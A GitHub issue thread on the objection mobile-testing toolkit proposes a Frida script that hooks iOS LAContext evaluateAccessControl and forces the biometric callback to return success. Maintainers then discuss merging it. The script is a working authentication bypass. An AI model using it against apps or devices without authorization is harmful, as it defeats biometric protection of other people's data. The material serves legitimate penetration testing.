search

sensepost / objection

📱 objection - runtime mobile exploration
GNU General Public License v3.0
7.46k stars 854 forks source link

Addition to iOS Biometric Bypass #410

Closed jnovak-praetorian closed 3 years ago

jnovak-praetorian commented 4 years ago

The current iOS biometric bypass supports hooking the evaluatePolicy function, but does not hook the evaluateAccessControl function which can be used in its place. A Frida script to hook the latter is given below, but it would be nice to incorporate this into the native ios ui biometrics_bypass functionality.

if (ObjC.available)
{
  try
  {
    var hook = ObjC.classes.LAContext["- evaluateAccessControl:operation:localizedReason:reply:"];
    Interceptor.attach(hook.implementation, {
      onEnter: function(args) {
        console.log("[*] evaluateAccessControl onEnter");

        // func evaluatePolicy(LAPolicy, localizedReason: String, reply: (Bool, Error?) -> Void)
        // reference: https://github.com/FSecureLABS/needle/blob/master/needle/modules/hooking/frida/script_touch-id-bypass.py
        /*
        var block = new ObjC.Block(args[4]);
        const appCallback = block.implementation;
        block.implementation = function (error, value)  {
          const result = appCallback(1, null);
          return result;
        };
        */

        // func evaluateAccessControl(SecAccessControl, operation: LAAccessControlOperation, localizedReason: String, reply: (Bool, Error?) -> Void)
        var block = new ObjC.Block(args[5]);
        const appCallback = block.implementation;
        block.implementation = function (error, value)  {
          console.log("[*] executing hooked evaluateAccessControl callback");
          const result = appCallback(1, null);
          return result;
        };

      },
      onLeave: function(retval) {
        console.log("[*] evaluateAccessControl onLeave")
      }
    });
  }
  catch(err)
  {
      console.log("[!] Exception: " + err.message);
  }
}
else
{
    console.log("Objective-C Runtime is not available!");
}
jnovak-praetorian commented 4 years ago

Example code for evaluateAccessControl can be found in this article.

leonjza commented 4 years ago

@jnovak-praetorian want to take a stab at a PR to include it?

jnovak-praetorian commented 4 years ago

yep, i'm gonna see if i can setup my dev environment and get this in a PR as it seems pretty straightforward.

duraki commented 3 years ago

@leonjza can you close this issue? PR was merged w/ master LTA.

leonjza commented 3 years ago

Yup! Thanks.